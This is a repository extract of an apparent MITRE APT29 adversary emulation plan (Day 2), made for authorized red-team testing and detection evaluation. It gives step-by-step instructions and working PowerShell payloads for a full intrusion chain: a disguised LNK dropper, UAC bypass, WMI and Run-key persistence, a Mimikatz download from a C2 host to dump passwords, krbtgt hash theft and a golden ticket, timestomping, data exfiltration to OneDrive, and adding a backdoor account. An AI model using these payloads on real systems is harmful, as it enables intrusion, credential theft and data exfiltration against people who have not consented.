`37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk` 71 | 4. Drag `make_lnk.ps1` and `schemas.ps1` to Recycle Bin and empty the Recycle Bin (Right click > Empty Recycle Bin) 72 | 73 | ## Victim Setup 74 | 75 | ### For each of the 3 victims: 76 | 1. Login in as domain admin user 77 | 2. Ensure Windows Defender is off or configured to alert-only (https://support.microsoft.com/en-us/help/4027187/windows-10-turn-off-antivirus-protection-windows-security) 78 | 3. Change network type to Domain (https://www.itechtics.com/change-network-type-windows-10/#2-_Setting_network_type_using_Windows_Registry) 79 | 4. Set UAC to never notify (https://articulate.com/support/article/how-to-turn-user-account-control-on-or-off-in-windows-10) 80 | 5. Enable WinRM (https://support.microsoft.com/en-us/help/555966) 81 | 6. Enable UseLogonCredential in the WDigest Registry settings (https://support.microsoft.com/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a) 82 | 83 | ### For the initial victim (the workstation with Microsoft Outlook): 84 | 1. Login as non-domain admin user 85 | 2. Enable programatic access to Microsoft Outlook (https://www.slipstick.com/developer/change-programmatic-access-options/) 86 | 3. Open Outlook and sign in if necessary 87 | 88 | ## Beginning of Day2 Execution 89 | 90 | ### Step 11 - Initial Breach 91 | 92 | #### 11.A 93 | 94 | 1. As non-domain admin user, execute `37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk` (double click), output will display in terminal 95 | 2. You will now receive a new, low integrity callback 96 | 97 | ### Step 12 - Fortify Access 98 | 99 | #### 12.A 100 | 101 | 1. Load `timestomp.ps1` 102 | 2. Execute `timestomp C:\Users\oscar\AppData\Roaming\Microsoft\kxwn.lock` 103 | 104 | #### 12.B 105 | 106 | 1. Load `stepTwelve.ps1` 107 | 2. Execute `detectav` 108 | 109 | #### 12.C 110 | 111 | 1. Execute `software` 112 | 113 | ### Step 13 - Local Enumeration 114 | 115 | #### 13.A 116 | 117 | 1. Load `stepThirteen.ps1` 118 | 2. Execute `comp` 119 | 120 | #### 13.B 121 | 122 | 1. Execute `domain` 123 | 124 | #### 13.C 125 | 126 | 1. Execute `user` 127 | 128 | #### 13.D 129 | 130 | 1. Execute `pslist` 131 | 132 | ### Step 14 - Elevation 133 | 134 | #### 14.A 135 | 136 | 1. Load `stepFourteen_bypassUAC.ps1` 137 | 2. Execute `bypass` 138 | 3. You will now receive a new, high integrity callback 139 | 140 | #### 14.B 141 | 142 | 1. Go to where m.exe is on C2 server in another terminal 143 | 2. Confirm `m.exe` is there and is a Windows PE (`$ file m`) 144 | * `m.exe` is a copy of the Mimikatz executable (available at https://github.com/gentilkiwi/mimikatz) 145 | 3. Host file on port 8080 (`$ sudo python -m SimpleHTTPServer 8080`) 146 | 4. Interact with new callback 147 | 5. Load `stepFourteen_credDump.ps1` 148 | 6. Execute `wmidump` 149 | 7. Kill the python server (CTRL-C) once you see a GET request on the python server (VM terminal) 150 | 151 | ### Step 15 - Establish Persistence 152 | 153 | #### 15.A 154 | 155 | 1. Load `stepFifteen_wmi.ps1` 156 | 2. Execute `wmi` 157 | 158 | **Note:** Do not RDP into the initial access from this point forward, you will trigger callbacks intended for step 20 159 | 160 | ### Step 16 - Lateral Movement 161 | 162 | #### 16.A 163 | 164 | 1. Interact with low integrity callback 165 | 2. Load `powerView.ps1` (available at https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) 166 | 3. Execute `get-netdomaincontroller` 167 | 168 | #### 16.B 169 | 170 | 1. Load `stepSixteen_SID.ps1` 171 | 2. Execute `siduser` 172 | 3. Save the value for the domain SID (ex: `S-1-5-21-2219224806-3979921203-557828661-1110`) and delete the RID (ex: `-1110`) of the end (ex: `S-1-5-21-2219224806-3979921203-557828661`) 173 | 174 | #### 16.C 175 | 176 | 1. Interact with high integrity callback 177 | 2. Load `Invoke-WinRMSession.ps1` (available at https://github.com/nettitude/PoshC2/blob/master/resources/modules/Invoke-WinRMSession.ps1) 178 | 3. Execute `invoke-winrmsession -Username "[insert domain admin username]" -Password "[insert domain admin password]" -IPAddress [insert domain controller IP]` 179 | 4. Output will tell you a session opened and give you the format for using it, ex: 180 | `Session opened, to run a command do the following:` 181 | `Invoke-Command -Session $[session_id] -scriptblock {Get-Process} | out-string` 182 | 5. Save the value for the session_id (ex: `$hzaqx`) 183 | 184 | **Note:** If you get an error here, reboot domain controller, then re-run the 2 winrm setup commands before re-executing 16.C 185 | 186 | #### 16.D 187 | 188 | 1. Execute `Copy-Item m.exe -Destination "C:\Windows\System32\" -ToSession $[session_id]` 189 | * `m.exe` is a copy of the Mimikatz executable (available at https://github.com/gentilkiwi/mimikatz) 190 | 2. Execute `Invoke-Command -Session $[session_id] -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string` 191 | 3. Take note of value for the NTLM hash (ex: `NTLM : f4a688010d80770a55a22893dc6ac510`) near the top (Under RID and User after `* Primary`) 192 | 4. Execute `Get-PSSession | Remove-PSSession` 193 | 194 | ### Step 17 - Collection 195 | 196 | #### 17.A 197 | 198 | 1. Interact with low integrity callback 199 | 2. Load `stepSeventeen_email.ps1` 200 | 3. Execute `psemail` 201 | 202 | #### 17.B 203 | 204 | 1. Interact with high integrity callback 205 | 2. Execute `New-Item -Path "C:\Windows\Temp\" -Name "WindowsParentalControlMigration" -ItemType "directory"` 206 | 3. Execute `Copy-Item "C:\Users\oscar\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration"` 207 | 208 | #### 17.C 209 | 210 | 1. Load `stepSeventeen_zip.ps1` 211 | 2. Execute `zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration` 212 | 213 | ### Step 18 - Exfiltration 214 | 215 | #### 18.A 216 | 217 | 1. Get CID for OneDrive account (https://www.laptopmag.com/articles/map-onedrive-network-drive) 218 | 2. Execute `net use y: https://d.docs.live.net/[CID] /user:[OneDrive account]@outlook.com "[OneDrive password]"` 219 | 3. Execute `Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "Y:\WindowsParentalControlMigration.tmp"` 220 | 4. Login to https://onedrive.live.com/?id=root&cid=[CID] to see exfil (`WindowsParentalControlMigration.tmp`) 221 | 222 | ### Step 19 - Clean UP 223 | 224 | #### 19.A 225 | 226 | 1. Load `wipe.ps1` 227 | 2. Execute `wipe "C:\Windows\System32\m.exe"` 228 | 229 | **Note:** There's a known bug here with ETW (Invoke-ReflectivePEInjection patches a function on the fly that ETW invokes) so callback may die and hang 230 | 231 | #### 19.B 232 | 233 | 1. Execute `wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"` 234 | 235 | #### 19.C 236 | 237 | 1. Execute `wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"` 238 | 239 | ### Step 20 - Leverage Persistence 240 | 241 | #### 20.A 242 | 243 | 1. Execute `restart-computer -force` 244 | 2. Existing 2 callbacks should die 245 | 3. RDP and login to initial victim once it reboots 246 | 4. Persistence mechanisms should fire on login (1 for DLL, 1 or more for WMI event subscription) 247 | 248 | **Note:** You may need to repeat login process a few times (close and reopen RDP session) for WMI execute to fire 249 | 250 | #### 20.B 251 | 252 | 1. Interact with the SYSTEM PS callback (from WMI) 253 | 2. Execute `klist purge` 254 | 3. Load `Invoke-Mimikatz.ps1` (available at https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1) 255 | 4. Execute `invoke-mimikatz -command '"kerberos::golden /domain:dmevals.local /sid:[SID] /rc4:[NTLM HASH] /user:mscott /ptt"'` using the SID and NTLM values from earlier 256 | 5. Execute `klist` and confirm ticket is in cache 257 | 6. Execute `Enter-PSSession [hostname of second workstation in domain]` 258 | 7. Execute `Invoke-Command -ComputerName [hostname of second workstation in domain] -ScriptBlock {net user /add toby "pamBeesly<3"}` 259 | 260 | ## Liability / Responsible Usage 261 | 262 | This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research. 263 | 264 | ## Notice 265 | 266 | Copyright 2020 The MITRE Corporation 267 | 268 | Approved for Public Release; Distribution Unlimited. Case Number 19-03607-2. 269 | 270 | Licensed under the Apache License, Version 2.0 (the "License"); 271 | you may not use this file except in compliance with the License. 272 | You may obtain a copy of the License at 273 | 274 | http://www.apache.org/licenses/LICENSE-2.0 275 | 276 | Unless required by applicable law or agreed to in writing, software 277 | distributed under the License is distributed on an "AS IS" BASIS, 278 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 279 | See the License for the specific language governing permissions and 280 | limitations under the License. 281 | 282 | This project makes use of ATT&CK® 283 | 284 | [ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/) 285 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/Invoke-WinRMSession.ps1: -------------------------------------------------------------------------------- 1 | Function Get-RandomName 2 | { 3 | param ( 4 | [int]$Length 5 | ) 6 | $set = 'abcdefghijklmnopqrstuvwxyz'.ToCharArray() 7 | $result = '' 8 | for ($x = 0; $x -lt $Length; $x++) 9 | {$result += $set | Get-Random} 10 | return $result 11 | } 12 | Function Invoke-WinRMSession { 13 | param ( 14 | $username, 15 | $Password, 16 | $IPAddress 17 | ) 18 | $PSS = ConvertTo-SecureString $password -AsPlainText -Force 19 | $getcreds = new-object system.management.automation.PSCredential $username,$PSS 20 | 21 | $randomvar = (Get-RandomName 5) 22 | New-Variable -Name $randomvar -Scope Global -Value (New-PSSession -ComputerName $IPAddress -Credential $getcreds) 23 | $randomvar = "$"+"$randomvar" 24 | Return "`nSession opened, to run a command do the following:`nInvoke-Command -Session $randomvar -scriptblock {Get-Process} | out-string" 25 | 26 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/m -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/make_lnk.ps1: -------------------------------------------------------------------------------- 1 | $destination = "37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk" 2 | $shell = New-Object -COM WScript.Shell 3 | $shortcut = $shell.CreateShortcut($destination) 4 | $shortcut.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 5 | $shortcut.Arguments = "Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX" 6 | $shortcut.Description = "The Shocking Truth About Election Rigging in America" 7 | $shortcut.Save() 8 | Add-Content -Path '.\2016_United_States_presidential_election_-_Wikipedia.html' -Value $(Get-Content .\schemas.ps1) -Stream schemas -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/schemas.ps1: -------------------------------------------------------------------------------- 1 | gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_BIOS" 2 | gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_PnPEntity" 3 | gwmi -namespace root\cimv2 -query "Select * from Win32_ComputerSystem" 4 | gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_Process" 5 | (Get-Item -Path ".\" -Verbose).FullName 6 | $bin = "" 7 | $bin | Add-Content -Path blob 8 | certutil -decode blob "$env:appdata\Microsoft\kxwn.lock" 9 | Remove-Item -Path blob 10 | New-ItemProperty -Force -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "WebCache" -Value "C:\windows\system32\rundll32.exe $env:appdata\Microsoft\kxwn.lock,VoidFunc" 11 | $enc_ps = "" 12 | $ps = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($enc_ps)) 13 | IEX($ps) 14 | Invoke-Item '2016_United_States_presidential_election_-_Wikipedia.html' -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepFifteen_wmi.ps1: -------------------------------------------------------------------------------- 1 | function wmi { 2 | 3 | $FilterArgs = @{name='WindowsParentalControlMigration'; 4 | EventNameSpace='root\CimV2'; 5 | QueryLanguage="WQL"; 6 | Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LoggedOnUser' AND TargetInstance.__RELPATH like '%$($env:UserName)%'";} 7 | $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs 8 | 9 | $ConsumerArgs = @{name='WindowsParentalControlMigration'; 10 | CommandLineTemplate="";} 11 | $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs 12 | 13 | $FilterToConsumerArgs = @{ 14 | Filter = [Ref] $Filter 15 | Consumer = [Ref] $Consumer 16 | } 17 | $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs 18 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepFourteen_bypassUAC.ps1: -------------------------------------------------------------------------------- 1 | # This code was derived from http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass 2 | 3 | function bypass { 4 | New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value "" 5 | New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" 6 | Start-Process -FilePath $env:windir\system32\sdclt.exe 7 | Start-Sleep -s 3 8 | Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse 9 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepFourteen_credDump.ps1: -------------------------------------------------------------------------------- 1 | # This code was derived from https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html 2 | 3 | function wmidump { 4 | $newClass = New-Object System.Management.ManagementClass("root\cimv2", [String]::Empty, $null) 5 | $newClass["__CLASS"] = "Win32_AuditCode" 6 | $newClass.Qualifiers.Add("Static", $true) 7 | $newClass.Properties.Add("Code", [System.Management.CimType]::String, $false) 8 | $newClass.Properties["Code"].Qualifiers.Add("key", $true) 9 | $newClass.Properties["Code"].Value = "" 10 | $newClass.Properties.Add("Result", [System.Management.CimType]::String, $false) 11 | $newClass.Properties["Result"].Qualifiers.Add("Key", $true) 12 | $newClass.Properties["Result"].Value = "" 13 | $newClass.Put() 14 | Start-Sleep -s 5 15 | $p = [wmiclass]"\\.\root\cimv2:Win32_Process" 16 | $s = [wmiclass]"\\.\root\cimv2:Win32_ProcessStartup" 17 | $s.Properties['ShowWindow'].value=$false 18 | $code = ([wmiclass]"\\.\root\cimv2:Win32_AuditCode").Properties["Code"].value 19 | $p.Create("powershell.exe -enc $code") 20 | $ps = Get-Process powershell | select starttime,id | Sort-Object -Property starttime | select -last 1 | select -expandproperty id 21 | Get-Process powershell | select starttime,id 22 | $ps 23 | Wait-Process -Id $ps 24 | $EncodedText = Get-WmiObject -Class Win32_AuditCode -NameSpace "root\cimv2" | Select -ExpandProperty Result 25 | $DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText)) 26 | Return $DecodedText 27 | 28 | # Update the C2 IP value below then encode the command using https://raikia.com/tool-powershell-encoder/ 29 | # Paste encoded output into quote on line 7 -- $newClass.Properties["Code"].Value = "[Here]" 30 | # $wc = New-Object System.Net.WebClient; $wc.DownloadFile("http://[C2 IP]:8080/m","m.exe"); $ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo; $ProcessInfo.FileName = "m.exe"; $ProcessInfo.RedirectStandardError = $true; $ProcessInfo.RedirectStandardOutput = $true; $ProcessInfo.UseShellExecute = $false; $ProcessInfo.Arguments = @("privilege::debug","sekurlsa::logonpasswords","exit"); $Process = New-Object System.Diagnostics.Process; $Process.StartInfo = $ProcessInfo; $Process.Start() | Out-Null; $output = $Process.StandardOutput.ReadToEnd(); $Pws = ""; ForEach ($line in $($output -split "`r`n")) {if ($line.Contains('Password') -and ($line.length -lt 50)) {$Pws += $line}}; $PwBytes = [System.Text.Encoding]::Unicode.GetBytes($Pws); $EncPws =[Convert]::ToBase64String($PwBytes); Set-WmiInstance -Path \\.\root\cimv2:Win32_AuditCode -Argument @{Result=$EncPws} 31 | 32 | # Note: Running this script multiple times on the same victim may fail unless you delete the created WMI Class 33 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepSeventeen_email.ps1: -------------------------------------------------------------------------------- 1 | # This code was derived from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/Get-Inbox.ps1 2 | 3 | function psemail { 4 | Add-type -assembly "Microsoft.Office.Interop.Outlook" | out-null 5 | $olFolders = "Microsoft.Office.Interop.Outlook.olDefaultFolders" -as [type] 6 | $outlook = new-object -comobject outlook.application 7 | $namespace = $outlook.GetNameSpace("MAPI") 8 | $folder = $namespace.getDefaultFolder($olFolders::olFolderInBox) 9 | $folder.items | Select-Object -Property Subject, ReceivedTime, SenderName, Body 10 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepSeventeen_zip.ps1: -------------------------------------------------------------------------------- 1 | # This code was derived from https://github.com/matthewdunwoody/POSHSPY 2 | 3 | function zip( $zipfilename, $sourcedir ) 4 | { 5 | Add-Type -Assembly System.IO.Compression.FileSystem 6 | $compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal 7 | [System.IO.Compression.ZipFile]::CreateFromDirectory($sourcedir, $zipfilename, $compressionLevel, $false) 8 | Start-Sleep -s 3 9 | $fileContent = get-content $zipfilename 10 | $fileContentBytes = [System.Text.Encoding]::UTF8.GetBytes($fileContent) 11 | $fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes) 12 | $fileContentEncoded | set-content $zipfilename 13 | [Byte[]] $x = 0x47,0x49,0x46,0x38,0x39,0x61 14 | $save = get-content $zipfilename 15 | $x | set-content $zipfilename -Encoding Byte 16 | add-content $zipfilename $save 17 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepThirteen.ps1: -------------------------------------------------------------------------------- 1 | # This code was derived from http://www.pinvoke.net 2 | 3 | function comp { 4 | $Signature=@" 5 | [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Auto)] 6 | static extern bool GetComputerNameEx(COMPUTER_NAME_FORMAT NameType,string lpBuffer, ref uint lpnSize); 7 | enum COMPUTER_NAME_FORMAT 8 | {ComputerNameNetBIOS,ComputerNameDnsHostname,ComputerNameDnsDomain,ComputerNameDnsFullyQualified,ComputerNamePhysicalNetBIOS,ComputerNamePhysicalDnsHostname,ComputerNamePhysicalDnsDomain,ComputerNamePhysicalDnsFullyQualified} 9 | public static string GCN() { 10 | bool success; 11 | string name = " "; 12 | uint size = 20; 13 | success = GetComputerNameEx(COMPUTER_NAME_FORMAT.ComputerNameNetBIOS, name, ref size); 14 | return "NetBIOSName:\t" + name.ToString(); 15 | } 16 | "@ 17 | Add-Type -MemberDefinition $Signature -Name GetCompNameEx -Namespace Kernel32 18 | $result = [Kernel32.GetCompNameEx]::GCN() 19 | return $result 20 | } 21 | function domain { 22 | $Signature=@" 23 | [DllImport("netapi32.dll", SetLastError=true)] 24 | public static extern int NetWkstaGetInfo(string servername, int level, out IntPtr bufptr); 25 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 26 | public struct WKSTA_INFO_100 { 27 | public int platform_id; 28 | public string computer_name; 29 | public string lan_group; 30 | public int ver_major; 31 | public int ver_minor; 32 | } 33 | public static string NWGI() 34 | { 35 | string host = null; 36 | IntPtr buffer; 37 | var ret = NetWkstaGetInfo(host, 100, out buffer); 38 | var strut_size = Marshal.SizeOf(typeof (WKSTA_INFO_100)); 39 | WKSTA_INFO_100 wksta_info; 40 | wksta_info = (WKSTA_INFO_100) Marshal.PtrToStructure(buffer, typeof (WKSTA_INFO_100)); 41 | string domainName = wksta_info.lan_group; 42 | return "DomainName:\t" + domainName.ToString(); 43 | } 44 | "@ 45 | Add-Type -MemberDefinition $Signature -Name NetWGetInfo -Namespace NetAPI32 46 | $result = [NetAPI32.NetWGetInfo]::NWGI() 47 | return $result 48 | } 49 | function user { 50 | $Signature=@" 51 | [DllImport("secur32.dll", CharSet=CharSet.Auto, SetLastError=true)] 52 | public static extern int GetUserNameEx (int nameFormat, string userName, ref int userNameSize); 53 | public static string GUN() { 54 | string uname = " "; 55 | int size = 40; 56 | int EXTENDED_NAME_FORMAT_NAME_DISPLAY = 2; 57 | string ret = ""; 58 | if(0 != GetUserNameEx(EXTENDED_NAME_FORMAT_NAME_DISPLAY, uname, ref size)) 59 | { 60 | ret += "UserName:\t" + uname.ToString(); 61 | } 62 | return ret; 63 | } 64 | "@ 65 | Add-Type -MemberDefinition $Signature -Name GetUNameEx -Namespace Secur32 66 | $result = [Secur32.GetUNameEx]::GUN() 67 | return $result 68 | } 69 | function pslist { 70 | $Signature=@" 71 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] 72 | private struct PROCESSENTRY32 73 | { 74 | const int MAX_PATH = 260; 75 | internal UInt32 dwSize; 76 | internal UInt32 cntUsage; 77 | internal UInt32 th32ProcessID; 78 | internal IntPtr th32DefaultHeapID; 79 | internal UInt32 th32ModuleID; 80 | internal UInt32 cntThreads; 81 | internal UInt32 th32ParentProcessID; 82 | internal Int32 pcPriClassBase; 83 | internal UInt32 dwFlags; 84 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = MAX_PATH)] 85 | internal string szExeFile; 86 | } 87 | [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] 88 | static extern IntPtr CreateToolhelp32Snapshot([In]UInt32 dwFlags, [In]UInt32 th32ProcessID); 89 | 90 | [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] 91 | static extern bool Process32First([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe); 92 | 93 | [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] 94 | static extern bool Process32Next([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe); 95 | 96 | [DllImport("kernel32", SetLastError = true)] 97 | [return: MarshalAs(UnmanagedType.Bool)] 98 | private static extern bool CloseHandle([In] IntPtr hObject); 99 | 100 | public static string CT32S() { 101 | IntPtr hProcessSnap = CreateToolhelp32Snapshot(0x00000002, 0); 102 | PROCESSENTRY32 procEntry = new PROCESSENTRY32(); 103 | procEntry.dwSize = (UInt32)Marshal.SizeOf(typeof(PROCESSENTRY32)); 104 | string ret = ""; 105 | if (Process32First(hProcessSnap, ref procEntry)) 106 | { 107 | do 108 | { 109 | ret += (procEntry.th32ProcessID).ToString() + "\t" + (procEntry.szExeFile).ToString() + "\n"; 110 | } while (Process32Next(hProcessSnap, ref procEntry)); 111 | } 112 | CloseHandle(hProcessSnap); 113 | return ret; 114 | } 115 | "@ 116 | Add-Type -MemberDefinition $Signature -Name CT32Snapshot -Namespace Kernel32 117 | $result = [Kernel32.CT32Snapshot]::CT32S() 118 | return $result 119 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepTwelve.ps1: -------------------------------------------------------------------------------- 1 | function detectav { 2 | $AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct 3 | 4 | $ret = @() 5 | foreach($AntiVirusProduct in $AntiVirusProducts){ 6 | 7 | #Create hash-table for each computer 8 | $ht = @{} 9 | $ht.Name = $AntiVirusProduct.displayName 10 | $ht.'Product GUID' = $AntiVirusProduct.instanceGuid 11 | $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe 12 | $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe 13 | $ht.'Timestamp' = $AntiVirusProduct.timestamp 14 | 15 | 16 | #Create a new object for each computer 17 | $ret += New-Object -TypeName PSObject -Property $ht 18 | } 19 | Return $ret 20 | } 21 | function software { 22 | $comp = $env:ComputerName 23 | $keys = "SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall", 24 | "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" 25 | $type = [Microsoft.Win32.RegistryHive]::LocalMachine 26 | $regKey = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey($type, $comp) 27 | $ret = "" 28 | foreach ($key in $keys) { 29 | $a = $regKey.OpenSubKey($key) 30 | $subkeyNames = $a.GetSubKeyNames() 31 | foreach($subkeyName in $subkeyNames) { 32 | $productKey = $a.OpenSubKey($subkeyName) 33 | $productName = $productKey.GetValue("DisplayName") 34 | $productVersion = $productKey.GetValue("DisplayVersion") 35 | $productComments = $productKey.GetValue("Comments") 36 | $out = $productName + " | " + $productVersion + " | " + $productComments + "`n" 37 | $ret += $out 38 | } 39 | } 40 | Return $ret 41 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/timestomp.ps1: -------------------------------------------------------------------------------- 1 | # This code was derived from https://github.com/matthewdunwoody/POSHSPY 2 | 3 | function timestomp { 4 | [CmdletBinding()] param ( 5 | [string] $dest 6 | ) 7 | $source = (gci ((gci env:windir).Value + '\system32') | ? { !$_.PSIsContainer } | Where-Object { $_.LastWriteTime -lt "01/01/2013" } | Get-Random | %{ $_.FullName }) 8 | [IO.File]::SetCreationTime($dest, [IO.File]::GetCreationTime($source)) 9 | [IO.File]::SetLastAccessTime($dest, [IO.File]::GetLastAccessTime($source)) 10 | [IO.File]::SetLastWriteTime($dest, [IO.File]::GetLastWriteTime($source)) 11 | } 12 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/README.md: -------------------------------------------------------------------------------- 1 | # Emulation Plan 2 | 3 | Please see the formal [APT29 emulation document](APT29_EmuPlan.pdf), which includes a break-down of the cited intelligence used for each step of this emulation. 4 | 5 | The Evaluations emulation is split into two distinct scenarios (Days 1 and 2) to reflect these differing operational flows and toolkits used by APT29. 6 | 7 | ![APT Operation Flow](APT29_Opflow.png) 8 | 9 | ## Day 1 10 | 11 | Based on `CosmicDuke` [ATT&CK S0050](https://attack.mitre.org/software/S0050/), `MiniDuke` [ATT&CK S0051](https://attack.mitre.org/software/S0051/), `SeaDuke/SeaDaddy` [ATT&CK S0053](https://attack.mitre.org/software/S0053/), `CozyDuke/CozyCar` [ATT&CK S0046](https://attack.mitre.org/software/S0046/), and `HAMMERTOSS` [ATT&CK S0037](https://attack.mitre.org/software/S0037/) 12 | 13 | This scenario begins with a legitimate user clicking on a malicious payload delivered via a “spray and pray” broad spearphishing. campaign. The attacker immediately kicks off a “smash-and-grab”, rapid espionage mission, gathering and exfiltrating data. After initial exfiltration, the attacker realizes the value of victim and subsequently deploys a stealthier toolkit, changing TTPs​ and eventually moving laterally through the rest of the environment. The scenario ends with the execution of previously established persistence mechanisms are executed. 14 | 15 | This content to execute this scenario was tested and developed using [Pupy](https://github.com/n1nj4sec/pupy), [Meterpreter](https://github.com/rapid7/metasploit-framework), and other custom/modified scripts and payloads. Pupy and Meterpreter were chosen based on their available functionality and similarities to the adversary's malware within the context of this scenario, but alternative red team tooling could be used to accurately execute these and other APT29 behaviors. 16 | 17 | ## Day 2 18 | 19 | Based on `PowerDuke` [ATT&CK S0139](https://attack.mitre.org/software/S0139/), `POSHSPY` [ATT&CK S0150](https://attack.mitre.org/software/S0150/), `CloudDuke` [ATT&CK S0054](https://attack.mitre.org/software/S0054/), and more recent (2016+) TTPs 20 | 21 | This scenario begins with a legitimate user clicking on a malicious payload delivered via a targeted spearphishing​ campaign. The attacker employs a low and slow, methodical approach​ to owning the initial target, establishing persistence, gathering credential materials​, then finally enumerating and owning the entire domain​. Data exfiltration is dumped to a public cloud storage​. The scenario ends with a simulated time-lapse where previously established persistence mechanisms are executed. 22 | 23 | This content to execute this scenario was tested and developed using [PoshC2](https://github.com/nettitude/PoshC2) and other custom/modified scripts and payloads. PoshC2 was chosen based on its available functionality and similarities to the adversary's malware within the context of this scenario, but alternative red team tooling could be used to accurately execute these and other APT29 behaviors. 24 | 25 | ## Liability / Responsible Usage 26 | 27 | This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research. 28 | 29 | ## Notice 30 | 31 | Copyright 2020 The MITRE Corporation 32 | 33 | Approved for Public Release; Distribution Unlimited. Case Number 19-03607-2. 34 | 35 | Licensed under the Apache License, Version 2.0 (the "License"); 36 | you may not use this file except in compliance with the License. 37 | You may obtain a copy of the License at 38 | 39 | http://www.apache.org/licenses/LICENSE-2.0 40 | 41 | Unless required by applicable law or agreed to in writing, software 42 | distributed under the License is distributed on an "AS IS" BASIS, 43 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 44 | See the License for the specific language governing permissions and 45 | limitations under the License. 46 | 47 | This project makes use of ATT&CK® 48 | 49 | [ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/) -------------------------------------------------------------------------------- /adversary_emulation/APT29/README.md: -------------------------------------------------------------------------------- 1 | *This content has been ported to https://github.com/center-for-threat-informed-defense/adversary_emulation_library as of January 2021. This format was preserved in [/Archive](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/apt29/Archive).* 2 | 3 | # APT29 Emulation 4 | 5 | This content was developed as part of the APT29 ATT&CK Evaluations and includes both the resources used to [manually execute the emulation](https://attackevals.mitre-engenuity.org/APT29/scope) as well as a plug-in developed for [CALDERA](https://github.com/mitre/caldera) (2.6.6). 6 | 7 | For more details about the APT29 ATT&CK Evaluations, including results, visit https://attackevals.mitre-engenuity.org/APT29/ 8 | 9 | ## 